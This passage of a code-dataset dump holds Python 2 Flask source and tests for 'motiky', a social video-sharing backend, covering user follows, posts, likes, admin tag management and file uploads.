authutil.get_user_id(g.ukey)\n        for uid in data['user_ids']:\n            try:\n                backend.follow_user(from_id,uid)\n                backend.add_activity({\n                    'from_id':from_id,\n                    'to_id':uid,\n                    'atype':'follow'\n                })\n            except BackendError,ex:\n                pass\n\n        return '',201\n\n\n    def delete(self,user_id_to):\n        '''Unfollow a user.'''\n        user_id = authutil.get_user_id(g.ukey)\n        try:\n            backend.unfollow_user(user_id,user_id_to)\n        except BackendError,ex:\n            raise \n        return '',204\n\n\nclass UserIsFollowingView(MethodView):\n\n    def get(self,user_id_to):\n        user_id = authutil.get_user_id(g.ukey)\n        ret = backend.is_following_user(user_id,user_id_to)\n        return jsonify(is_follow=ret)\n\n\nclass UserFollowingView(MethodView):\n\n    def get(self,user_id):\n        try:\n            page = int(request.values.get('page'))\n        except:\n            page = 1\n\n        limit = 50\n        offset = (page-1) * 50\n\n        following_users = backend.get_user_following(user_id,limit=limit,\n                offset=offset)\n\n        curr_user = backend.get_user_by_uid(g.ukey)\n\n        fids = [u['id'] for u in following_users]\n        fdict = backend.is_following_user(curr_user['id'],fids)\n        for fu in following_users:\n            fu['follower_count'] = backend.get_user_follower_count(fu['id'])\n            fu['is_follow'] = fdict.get(fu['id']) or False\n        count = backend.get_user_following_count(user_id)\n        total_page = (count + 49) / 50\n        return jsonify(users=following_users,page=page,total_page=total_page)\n\n\nclass 
UserFollowerView(MethodView):\n\n    def get(self,user_id):\n        try:\n            page = int(request.values.get('page'))\n        except:\n            page = 1\n\n        limit = 50\n        offset = (page - 1) * 50\n        followers = backend.get_user_follower(user_id,limit=limit,offset=offset)\n        fids = [u['id'] for u in followers]\n\n        curr_user = backend.get_user_by_uid(g.ukey)\n\n        fdict = backend.is_following_user(curr_user['id'],fids)\n        for fu in followers:\n            fu['follower_count'] = backend.get_user_follower_count(fu['id'])\n            fu['is_follow'] = fdict.get(fu['id']) or False\n        count = backend.get_user_follower_count(user_id)\n        total_page = (count + 49) / 50\n        return jsonify(users=followers,page=page,total_page=total_page)\n\nclass ProfileView(MethodView):\n\n    def get(self,user_id):\n        user = backend.get_user(user_id)\n\n        user_following_count = backend.get_user_following_count(user_id)\n        user_follower_count = backend.get_user_follower_count(user_id)\n        user_post_count = backend.get_user_post_count(user_id)\n        user_liked_post_count = backend.get_user_liked_post_count(user_id)\n\n        curr_user = backend.get_user_by_uid(g.ukey)\n\n        is_follow = backend.is_following_user(curr_user['id'],user_id)\n        \n        pd = {\n            'is_follow':is_follow,\n            'following_count':user_following_count,\n            'follower_count':user_follower_count,\n            'post_count':user_post_count,\n            'liked_post_count':user_liked_post_count\n        }\n        user.update(pd)\n        return jsonify(**user)\n\n\n# register each view once and reuse it, so Flask does not see duplicate endpoints\nuser_view = UserView.as_view('user')\nuser_follow_view = UserFollowView.as_view('user_follow')\n\ninstance.add_url_rule('/user',view_func=user_view,\n        methods=['POST',])\ninstance.add_url_rule('/user/<int:user_id>',view_func=user_view,\n        methods=['GET','PUT'])\ninstance.add_url_rule('/install',view_func=InstallView.as_view('install'),\n        methods=['POST'])\ninstance.add_url_rule('/user/follow',view_func=user_follow_view,\n        methods=['POST'])\ninstance.add_url_rule('/user/follow/<int:user_id_to>',view_func=user_follow_view,\n        methods=['DELETE'])\ninstance.add_url_rule('/user/isfollowing/<int:user_id_to>',\n        view_func=UserIsFollowingView.as_view('user_is_following'),\n        methods=['GET'])\ninstance.add_url_rule('/user/following/<int:user_id>',\n        view_func=UserFollowingView.as_view('user_following'),\n        methods=['GET'])\ninstance.add_url_rule('/user/follower/<int:user_id>',\n        view_func=UserFollowerView.as_view('user_follower'),\n        methods=['GET'])\ninstance.add_url_rule('/user/profile/<int:user_id>',\n        view_func=ProfileView.as_view('user_profile'),\n        methods=['GET'])\n\n" }, { "alpha_fraction": 0.6138364672660828, "alphanum_fraction": 0.6150943636894226, "avg_line_length": 22.382352828979492, "blob_id": "40248a5a1a38541c04206d887a7382ed921a27dc", "content_id": "8d463e6ad9ee29fee4ac69c84f0a45d3117a42dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 795, "license_type": "no_license", "max_line_length": 89, "num_lines": 34, "path": "/tests/__init__.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport unittest\nimport logging\nimport time\nimport hmac\n\nfrom flask.ext.testing import TestCase as Base\n\nfrom motiky import create_app\nfrom motiky import configs\nfrom motiky.configs import db,redis\n\nclass TestCase(Base):\n\n    def create_app(self):\n        app = create_app(configs.TestConfig)\n        app.config['TESTING'] = True\n        return app\n\n    def generate_header(self,ukey):\n        _now = int(time.time())\n        token = '%s|%d|%s' % (ukey,_now,hmac.new(configs.TestConfig().APPLICATION_SECRET,\n                    ukey+str(_now)).hexdigest())\n        return {'X-MOTIKY-TOKEN':token}\n\n    def 
setUp(self):\n        db.create_all()\n        redis.flushdb()\n\n    def tearDown(self):\n        db.session.remove()\n        db.drop_all()\n" }, { "alpha_fraction": 0.7609890103340149, "alphanum_fraction": 0.7637362480163574, "avg_line_length": 19.705883026123047, "blob_id": "f4971b8321bbdaeb1dcba73a6718fbe5b7f40178", "content_id": "67cae1ea73ce666d810d09762ec093baaf48d59b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 34, "num_lines": 17, "path": "/motiky/views/index.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport sys \nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask.views import MethodView\nfrom flask.views import View\n\n\n\n \n\n\n\n\n" }, { "alpha_fraction": 0.5646132826805115, "alphanum_fraction": 0.569900393486023, "avg_line_length": 30.13793182373047, "blob_id": "d0f33ab99ac44f434b34924ecff30bbeef689a7a", "content_id": "78c4226e2984a0c349df6a7d000286e628a04477", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8133, "license_type": "no_license", "max_line_length": 84, "num_lines": 261, "path": "/motiky/views/post.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport os\nimport sys\nimport md5\nimport time\nimport logging\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask import abort\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom motiky import authutil\nfrom motiky import strutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\n\nfrom motiky.upyun import UpYun,md5,md5file\n\nfrom motiky.schema import NewPostSchema,UpdatePostSchema,\\\n        PostLikeSchema,PostUnlikeSchema\n\ninstance = Blueprint('post',__name__)\n\nupYun = UpYun('xxxxxxxx','xxxxxxxxxx','xxxxxxxxx')\nupYun.setApiDomain('v0.api.upyun.com')\nupYun.debug = True\n\ndef save_file(file_data,ftype):\n    file_md5 = md5(file_data)\n    file_size = len(file_data)\n    file_id = backend.add_file_data(file_size,file_md5)\n    extname = 'mp4' if ftype == 'video' else 'jpg'\n    file_url = '%s.%s' % (file_id,extname)\n    if current_app.config.get('CONFIG_TYPE') == 'production':\n        upYun.writeFile('/'+file_url,file_data)\n    else:\n        writeFile('/storage/' + file_url,file_data)\n    return file_id,file_url\n\n\ndef writeFile(file_url,file_data):\n    dirname = os.path.dirname(file_url)\n    if not os.path.exists(dirname):\n        os.makedirs(dirname,0777)\n\n    with open(file_url,'wb') as f:\n        f.write(file_data)\n        f.flush()\n\nclass PostView(MethodView):\n\n    def get(self,post_id):\n        post = backend.get_post(post_id)\n        curr_user = backend.get_user_by_uid(g.ukey)\n        post['is_like'] = backend.is_like_post(curr_user['id'],post['id'])\n        post['like_count'] = backend.get_post_liked_count(post_id)\n        post['comment_count'] = backend.get_post_comment_count(post_id)\n        return jsonify(**post)\n\n    def post(self):\n        _data = {\n            'author_id':request.values.get('author_id'),\n            'title':request.values.get('title'),\n            
}\n data = NewPostSchema().deserialize(_data)\n \n user = backend.get_user(data['author_id'])\n \n if user['uid'] != g.ukey:\n return jsonify(error='not the user')\n\n # video_file\n video_file = request.files.get('video_file')\n video_data = strutil.read_data(video_file)\n video_id,video_url = save_file(video_data,'video')\n\n # pic_file\n pic_file = request.files.get('pic_file')\n pic_data = strutil.read_data(pic_file)\n pic_id,pic_url = save_file(pic_data,'pic')\n\n data['title'] = data['title'].encode('utf-8') if data['title'] else ''\n try:\n post = backend.add_post(\n data['title'],\n data['author_id'],\n video_url,\n pic_small=pic_url\n )\n except BackendError,ex:\n raise\n\n tags = strutil.extract_tags(data['title'])\n\n if tags:\n backend.add_post_tag(post['id'],tags)\n\n return jsonify(**post)\n\n def put(self,post_id):\n data = UpdatePostSchema().deserialize(request.json)\n try:\n backend.set_post(post_id,data)\n except BackendError,ex:\n abort(501)\n else:\n return '',204\n\n def delete(self,post_id):\n post = backend.get_post(post_id)\n curr_id = authutil.get_user_id(g.ukey)\n if post['author_id'] != curr_id:\n return jsonify(error='forbid')\n try:\n backend.set_post(post_id,{'show':'deleted_by_user'})\n except BackendError,ex:\n abort(501)\n else:\n return '',204\n\n\nclass PostListView(MethodView):\n\n def get(self):\n try:\n page = int(request.values.get('page','1'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1)*limit\n\n posts = backend.get_latest_post(limit=limit,offset=offset)\n count = backend.get_post_count()\n\n for post in posts:\n post['like_count'] = backend.get_post_liked_count(post['id'])\n post['comment_count'] = backend.get_post_comment_count(post['id'])\n \n total_page = (count + limit -1 ) / limit\n return jsonify(posts=posts,page=page,total_page=total_page)\n\n\nclass UserPostView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page','1'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1) * limit\n \n curr_user = backend.get_user_by_uid(g.ukey)\n user_posts = backend.get_user_post(user_id,limit=limit,offset=offset)\n\n liked_post_ids = [p['id'] for p in user_posts];\n liked_dict = backend.is_like_post(curr_user['id'],liked_post_ids)\n for up in user_posts:\n up['is_like'] = liked_dict.get(up['id']) or False\n up['like_count'] = backend.get_post_liked_count(up['id'])\n up['comment_count'] = backend.get_post_comment_count(up['id'])\n \n\n\n count = backend.get_user_post_count(user_id)\n total_page = (count + limit - 1) / limit\n\n return jsonify(posts=user_posts,page=page,total_page=total_page)\n\nclass UserLikedPostView(MethodView):\n\n def get(self,user_id):\n try:\n page = int(request.values.get('page'))\n except:\n page = 1\n\n limit = 20\n offset = (page-1) * limit\n\n liked_posts = backend.get_user_liked_post(user_id,limit=limit,offset=offset)\n for p in liked_posts:\n p['is_like'] = True\n p['like_count'] = backend.get_post_liked_count(p['id'])\n p['comment_count'] = backend.get_post_comment_count(p['id'])\n \n\n count = backend.get_user_liked_post_count(user_id)\n total_page = (count + limit -1) / limit\n \n return jsonify(posts=liked_posts,page=page,total_page=total_page)\n\nclass PostLikeView(MethodView):\n\n def post(self):\n data = PostLikeSchema().deserialize(request.json)\n try:\n ret = backend.add_like(data['user_id'],data['post_id'])\n except BackendError,ex:\n return jsonify(error='can not add like')\n\n try:\n post = backend.get_post(data['post_id'])\n backend.add_activity({\n 
'post_id':data['post_id'],\n                'from_id':data['user_id'],\n                'to_id':post['author_id'],\n                'atype':'like'\n            })\n        except BackendError,ex:\n            pass\n\n        liked_count = backend.get_post_liked_count(data['post_id'])\n\n        return jsonify(like_count=liked_count)\n\nclass PostUnlikeView(MethodView):\n\n    def post(self):\n        data = PostUnlikeSchema().deserialize(request.json)\n        try:\n            ret = backend.del_like(data['user_id'],data['post_id'])\n        except BackendError,ex:\n            raise \n\n        liked_count = backend.get_post_liked_count(data['post_id'])\n\n        return jsonify(like_count=liked_count)\n\n\n# reuse one view instance so both rules share the 'post' endpoint\npost_view = PostView.as_view('post')\ninstance.add_url_rule('/post',view_func=post_view,\n        methods=['POST'])\ninstance.add_url_rule('/post/<int:post_id>',view_func=post_view,\n        methods=['GET','PUT','DELETE'])\ninstance.add_url_rule('/posts',view_func=PostListView.as_view('posts'),\n        methods=['GET'])\ninstance.add_url_rule('/posts/user/<int:user_id>',\n        view_func=UserPostView.as_view('user_post'),\n        methods=['GET',])\ninstance.add_url_rule('/posts/user/<int:user_id>/liked',\n        view_func=UserLikedPostView.as_view('user_liked_post'),\n        methods=['GET',])\ninstance.add_url_rule('/post/like',\n        view_func=PostLikeView.as_view('post_like'),\n        methods=['POST',])\ninstance.add_url_rule('/post/unlike',\n        view_func=PostUnlikeView.as_view('post_unlike'),\n        methods=['POST',])\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.595625638961792, "alphanum_fraction": 0.5986775159835815, "avg_line_length": 27.83823585510254, "blob_id": "826a513505d77b0484a44d5d7de75f9cf5d9201f", "content_id": "c7b19287af36639dea79e125a75f79414dc27d24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1994, "license_type": "no_license", "max_line_length": 81, "num_lines": 68, "path": "/motiky/coreutil.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*- \n\nimport os\nimport sys\nimport time\nimport logging\nimport inspect\nimport traceback\n\n\n\nbackend_mapping = {}\ndef register(funcname=None):\n    global backend_mapping \n    def inter1(func,funcname=None):\n        funcname = funcname if funcname else func.__name__\n        if not backend_mapping.has_key(funcname):\n            backend_mapping[funcname] =func\n        else:\n            raise KeyError('%s:funcname declare more than once '%repr(funcname))\n        def inter2(*args,**kwargs):\n            return func(*args,**kwargs)\n        setattr(inter2,'argspec',inspect.getargspec(func))\n        return inter2\n    return lambda func:inter1(func,funcname)\n\ndef assert_error(expr,msg,detail=''):\n    if not expr:\n        if not detail:\n            detail = msg\n        raise BackendError(msg,detail)\n\nclass BackendError(Exception):\n    def __init__(self,message,detail):\n        self.message = message\n        self.detail = detail\n    \n    def __str__(self):\n        return 'BackendError(%s,%s)' % (self.message,self.detail)\n\n    def __repr__(self):\n        return 'BackendError(%s,%s)' %(self.message,self.detail)\n\n\nclass Backend(object):\n    '''Hide backend methods that should not be exported.'''\n    def __init__(self,func_mapping):\n        self.func_mapping = func_mapping\n\n    def __getattr__(self,attr_name):\n        if self.func_mapping.has_key(attr_name):\n            func = lambda *args,**kwargs: self.__call__(attr_name,*args,**kwargs)\n            func.__name__ = 'backend.' 
+ attr_name\n return func\n else:\n raise AttributeError('backend does not have %s attibute'%attr_name)\n\n\n def __call__(self,funcname,*args,**kwargs):\n try:\n return self.func_mapping[funcname](*args,**kwargs)\n except BackendError,ex:\n print ex.detail\n raise ex \n except Exception,ex:\n excstr = traceback.format_exc()\n print excstr\n raise BackendError('BackendError',excstr)\n\n\n\n\n\n" }, { "alpha_fraction": 0.5238507986068726, "alphanum_fraction": 0.5542064309120178, "avg_line_length": 33.1629638671875, "blob_id": "2bf898788870f8eeafde5b3c5a4b30203644e076", "content_id": "c2c12e00e13d1b9e72406cc9596adaf9f06689e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4612, "license_type": "no_license", "max_line_length": 82, "num_lines": 135, "path": "/tests/test_post.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom StringIO import StringIO\n\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestPost(TestCase):\n\n\n def test_post_view(self):\n\n # post\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n headers = self.generate_header('weibo_id01')\n data = {\n 'title':'title01',\n 'author_id':user1['id'],\n 'video_file':(StringIO('AAAA' * 10000),'hello.mp4'),\n 'pic_file':(StringIO('AAAA' * 1000),'hello.png')\n }\n\n resp = self.client.post('/post',data=data,headers=headers)\n\n _data = json.loads(resp.data)\n assert resp.status_code == 200\n assert _data['title'] == 'title01'\n\n # get\n resp = self.client.get('/post/%d' % _data['id'],headers=headers)\n data_get = json.loads(resp.data)\n print resp.data\n assert data_get['title'] == 'title01'\n\n # put\n put_in = {'pic_small':'pic_small'}\n resp = self.client.put('/post/%d'%_data['id'],data=json.dumps(put_in),\n headers=headers,content_type='application/json')\n print resp.data\n assert resp.status_code == 204\n\n def test_posts_view(self):\n\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n post3 = backend.add_post('post03',user1['id'],\n 'video_url','pic_small3')\n\n headers = self.generate_header('weibo_id01')\n\n resp = self.client.get('/posts',headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['posts']) == 3\n\n def test_user_posts(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n post3 = backend.add_post('post03',user1['id'],\n 'video_url','pic_small3')\n\n headers = self.generate_header('weibo_id01')\n\n resp = self.client.get('/posts/user/%d'%user1['id'],headers=headers)\n data_get = json.loads(resp.data)\n assert len(data_get['posts']) == 3\n\n def test_user_liked_posts(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n post1 = backend.add_post('post01',user1['id'],\n 'video_url','pic_small1')\n post2 = backend.add_post('post02',user1['id'],\n 'video_url','pic_small2')\n post3 = 
backend.add_post('post03',user1['id'],\n                'video_url','pic_small3')\n\n        headers = self.generate_header('weibo_id01')\n\n        ula1 = UserLikeAsso(user_id=user1['id'],post_id=post1['id'])\n        ula2 = UserLikeAsso(user_id=user1['id'],post_id=post2['id'])\n        ula3 = UserLikeAsso(user_id=user1['id'],post_id=post3['id'])\n\n        db.session.add(ula1)\n        db.session.add(ula2)\n        db.session.add(ula3)\n        db.session.commit()\n\n        resp = self.client.get('/posts/user/%d/liked'%user1['id'],headers=headers)\n        data_get = json.loads(resp.data)\n        assert len(data_get['posts']) == 3\n\n    def test_post_like(self):\n        user1 = backend.add_user('username01','photo_url01','weibo_id01')\n        post1 = backend.add_post('post01',user1['id'],\n                'video_url','pic_small1')\n\n        headers = self.generate_header('weibo_id01')\n\n        _data = {\n            'user_id':user1['id'],\n            'post_id':post1['id']\n        }\n        resp = self.client.post('/post/like',data=json.dumps(_data),\n                headers=headers,content_type='application/json')\n\n        data_get = json.loads(resp.data)\n        assert data_get['like_count'] == 1\n\n\n        resp = self.client.post('/post/unlike',data=json.dumps(_data),\n                headers=headers,content_type='application/json')\n\n        data_get = json.loads(resp.data)\n        assert data_get['like_count'] == 0\n" }, { "alpha_fraction": 0.6138541102409363, "alphanum_fraction": 0.6210390329360962, "avg_line_length": 25.710901260375977, "blob_id": "a30200bebc4d6ccc5048f07c4410d0d10b25300c", "content_id": "e0a5e2c9d58b6f1daf4068b2939874a93bf88340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5428, "license_type": "no_license", "max_line_length": 88, "num_lines": 211, "path": "/motiky/views/admin.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# author: notedit <[email protected]>\n\nimport os\nimport sys \nimport time\nimport uuid\nimport logging\nfrom datetime import datetime\n\nimport requests\n\nimport flask\nfrom flask import g\nfrom flask import request\nfrom flask import Blueprint\nfrom flask import redirect\nfrom flask import Response\nfrom flask import current_app\nfrom flask import session\nfrom flask import jsonify\nfrom flask import flash\nfrom flask import render_template\nfrom flask.views import MethodView\nfrom flask.views import View\n\nfrom werkzeug import secure_filename\n\nfrom motiky import authutil\nfrom motiky import strutil\nfrom motiky.logic import backend\nfrom motiky.coreutil import BackendError\nfrom motiky.configs import db\nfrom motiky.logic.models import User,Post,Report,Install,\\\n        UserFollowAsso,UserLikeAsso,Comment,Activity,Tag,Tagging,\\\n        CmsUser,Storage\n\nfrom motiky.upyun import UpYun,md5,md5file\n\ninstance = Blueprint('admin',__name__)\n\nupYun = UpYun('xxxxxx','xxxxxx','xxxxxx')\nupYun.setApiDomain('v0.api.upyun.com')\nupYun.debug = True\n\n# referenced by upload() below; assumed CDN prefix, configure per deployment\nupyun_prefix = ''\n\n@instance.route('/users')\ndef users_list():\n    page = request.values.get('page','1')\n    try:\n        page = int(page)\n    except:\n        page = 1\n\n    _users = User.query.order_by(User.date_create.desc()).limit(20).\\\n            offset((page - 1) * 20).all()\n\n    users_count = User.query.count()\n\n    users = []\n    for u in _users:\n        us = u.json\n        users.append(us)\n\n    total_page = (users_count + 19) / 20\n    \n    return render_template('user_list.html',users=users,page=page,total_page=total_page)\n\n\n@instance.route('/posts')\ndef post_list():\n    page = request.values.get('page','1')\n    try:\n        page = int(page)\n    except:\n        page = 1\n\n    _posts = Post.query.order_by(Post.date_create.desc()).limit(20).\\\n            offset((page - 1) * 20).all()\n    \n    posts_count = Post.query.count()\n\n    posts = []\n    for po in _posts:\n        pos = po.json\n        user = 
po.user.json\n        pos['user'] = user\n        posts.append(pos)\n\n    total_page = (posts_count + 19) / 20\n    \n    return render_template('post_list.html',posts=posts,count=posts_count,\n            page=page,total_page=total_page)\n\n@instance.route('/post/<int:post_id>/recommend')\ndef post_recommend(post_id):\n    post = Post.query.get(post_id)\n    post.recommended = True\n    db.session.commit()\n    return redirect('/admin/posts')\n\n@instance.route('/post/<int:post_id>/not_recommend')\ndef post_not_recommend(post_id):\n    post = Post.query.get(post_id)\n    post.recommended = False\n    db.session.commit()\n    return redirect('/admin/posts')\n\n@instance.route('/post/<int:post_id>/show')\ndef post_show(post_id):\n    post = Post.query.get(post_id)\n    post.show = True\n    db.session.commit()\n    return redirect('/admin/posts')\n\n@instance.route('/post/<int:post_id>/hide')\ndef post_hide(post_id):\n    post = Post.query.get(post_id)\n    post.show = False\n    db.session.commit()\n    return redirect('/admin/posts')\n\n@instance.route('/tags')\ndef tag_list():\n    page = request.values.get('page','1')\n    try:\n        page = int(page)\n    except:\n        page = 1\n\n    _tags = Tag.query.order_by(Tag.date_create.desc()).limit(20).\\\n            offset((page - 1) * 20).all()\n    \n    tags_count = Tag.query.count()\n\n    tags = []\n    for t in _tags:\n        t = t.json\n        tags.append(t)\n\n    total_page = (tags_count + 19) / 20\n    \n    return render_template('tag_list.html',tags=tags,\n            page=page,total_page=total_page)\n\n@instance.route('/add_tag',methods=['GET','POST'])\ndef add_tag():\n    if request.method == 'GET':\n        return render_template('add_tag.html')\n\n    name = request.values.get('name')\n    pic_url = request.values.get('pic_url')\n    order_seq = request.values.get('order_seq')\n    show = request.values.get('show') == 'true' or False\n    recommended = request.values.get('recommended') == 'true' or False\n\n    tag = Tag()\n    tag.name = name\n    tag.pic_url = pic_url\n    tag.order_seq = order_seq\n    tag.show = show\n    tag.recommended = recommended\n\n    try:\n        db.session.add(tag)\n        db.session.commit()\n    except:\n        db.session.rollback()\n        raise\n    else:\n        return redirect('/admin/tags')\n\n@instance.route('/tag/<int:tag_id>/edit',methods=['GET','POST'])\ndef edit_tag(tag_id):\n    tag = Tag.query.get(tag_id)\n\n    if request.method == 'GET':\n        return render_template('edit_tag.html',tag=tag.json)\n\n    name = request.values.get('name')\n    pic_url = request.values.get('pic_url')\n    order_seq = request.values.get('order_seq')\n    show = request.values.get('show') == 'true' or False\n    recommended = request.values.get('recommended') == 'true' or False\n\n    tag.name = name\n    tag.pic_url = pic_url\n    tag.order_seq = order_seq\n    tag.show = show\n    tag.recommended = recommended\n\n    try:\n        db.session.commit()\n    except:\n        db.session.rollback()\n        raise\n    else:\n        return redirect('/admin/tags')\n\n\n@instance.route('/upload',methods=['POST','GET'])\ndef upload():\n    if request.method == 'GET':\n        return render_template('upload.html',file_name='')\n\n    pic_file = request.files.get('upload')\n    fname = secure_filename(pic_file.filename)\n    extn = os.path.splitext(fname)[1]\n    cname = '/' + str(uuid.uuid4()) + str(extn)\n    pic_data = strutil.read_data(pic_file)\n    upYun.writeFile(cname,pic_data)\n    \n    cname = upyun_prefix + cname\n    return render_template('upload.html',file_name=cname)\n\n\n\n" }, { "alpha_fraction": 0.5363573431968689, "alphanum_fraction": 0.5702043175697327, "avg_line_length": 33.687686920166016, "blob_id": "8c54895d033f5089bee2fc779e6e7904b615e52b", "content_id": "fb2d840a75449d6e11e697bae1b66c03f7f2c36d", "detected_licenses": [], "is_generated": false, "is_vendor": 
false, "language": "Python", "length_bytes": 11552, "license_type": "no_license", "max_line_length": 83, "num_lines": 333, "path": "/tests/test_backend.py", "repo_name": "imgarth/motiky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nimport os\nimport sys\nimport types\nimport json\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom tests import TestCase\n\n\nfrom motiky.logic.models import User,Post,UserLikeAsso,Report,Install,\\\n UserFollowAsso,Comment,Activity,Action,Tag,Tagging\n\nfrom motiky.logic import backend\n\nfrom motiky.configs import db,redis\n\nclass TestUserLogic(TestCase):\n\n def test_get_user(self):\n user = User(username='username01',photo_url='photo_url01',uid='weibo_id01')\n db.session.add(user)\n db.session.commit()\n\n _user = backend.get_user(user.id)\n assert _user['username'] == user.username\n\n\n def test_add_user(self):\n user = backend.add_user('username','photo_url','weibo_id')\n assert user['username'] == 'username'\n\n def test_set_user(self):\n user = backend.add_user('username','photo_url','weibo_id')\n _user = backend.set_user(user['id'],{'username':'username2',\n 'photo_url':'photo_url2'})\n assert _user['username'] == 'username2'\n\n def test_get_user_by_uid(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n \n user = backend.get_user_by_uid(user1['uid'])\n assert user['username'] == user1['username']\n\n users = backend.get_user_by_uid([user1['uid'],user2['uid']])\n assert len(users) == 2\n\n\n def test_follow_user(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n\n ret = backend.follow_user(user1['id'],user2['id'])\n assert ret > 0\n\n def test_unfollow_user(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n\n ret = backend.follow_user(user1['id'],user2['id'])\n\n ret = backend.unfollow_user(user1['id'],user2['id'])\n assert ret == True\n\n def test_is_following_user(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n\n backend.follow_user(user1['id'],user2['id'])\n ret = backend.is_following_user(user1['id'],user2['id'])\n assert ret == True\n\n def test_get_user_following(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03')\n\n backend.follow_user(user1['id'],user2['id'])\n backend.follow_user(user1['id'],user3['id'])\n\n users = backend.get_user_following(user1['id'])\n assert len(users) == 2\n\n count = backend.get_user_following_count(user1['id'])\n assert count == 2\n\n def test_get_user_follower(self):\n user1 = backend.add_user('username01','photo_url01','weibo_id01')\n user2 = backend.add_user('username02','photo_url02','weibo_id02')\n user3 = backend.add_user('username03','photo_url03','weibo_id03')\n\n backend.follow_user(user2['id'],user1['id'])\n backend.follow_user(user3['id'],user1['id'])\n\n users = backend.get_user_follower(user1['id'])\n assert len(users) == 2\n \n count = backend.get_user_follower_count(user1['id'])\n assert count == 2\n \n\nclass TestPostLogic(TestCase):\n\n def test_get_post(self):\n user = 
backend.add_user('username','photo_url','weibo_id')\n post = Post(title='title',author_id=user['id'],pic_small='pic_small')\n db.session.add(post)\n db.session.commit()\n\n _post = backend.get_post(post.id)\n assert _post['title'] == 'title'\n\n def test_add_post(self):\n user = backend.add_user('username','photo_url','weibo_id')\n post = backend.add_post('title',user['id'],'video_url',\n pic_small='pic_small')\n \n assert post['title'] == 'title'\n\n post = backend.set_post(post['id'],{'title':'title2'})\n assert post['title'] == 'title2'\n\n def test_get_user_post(self):\n user = backend.add_user('username','photo_url','weibo_id')\n post1 = backend.add_post('title1',user['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user['id'],'video_url',\n pic_small='pic_small')\n \n posts = backend.get_user_post(user['id'])\n assert len(posts) == 2\n\n count = backend.get_user_post_count(user['id'])\n assert count == 2\n\n\n def test_get_user_liked_post(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n user2 = backend.add_user('username2','photo_url','weibo_id2')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n post2 = backend.add_post('title2',user1['id'],'video_url',\n pic_small='pic_small')\n\n ula1 = UserLikeAsso(user_id=user2['id'],post_id=post1['id'])\n ula2 = UserLikeAsso(user_id=user2['id'],post_id=post2['id'])\n db.session.add(ula1)\n db.session.add(ula2)\n db.session.commit()\n\n posts = backend.get_user_liked_post(user2['id'])\n assert len(posts) == 2\n\n count = backend.get_user_liked_post_count(user2['id'])\n assert count == 2\n\n\n def test_add_like(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n post1 = backend.add_post('title1',user1['id'],'video_url',\n pic_small='pic_small')\n\n ret = backend.add_like(user1['id'],post1['id'])\n assert ret == 1\n\n ret = backend.del_like(user1['id'],post1['id'])\n assert ret == True\n\n def test_is_like_post(self):\n user1 = backend.add_user('username1','photo_url','weibo_id1')\n post1 = 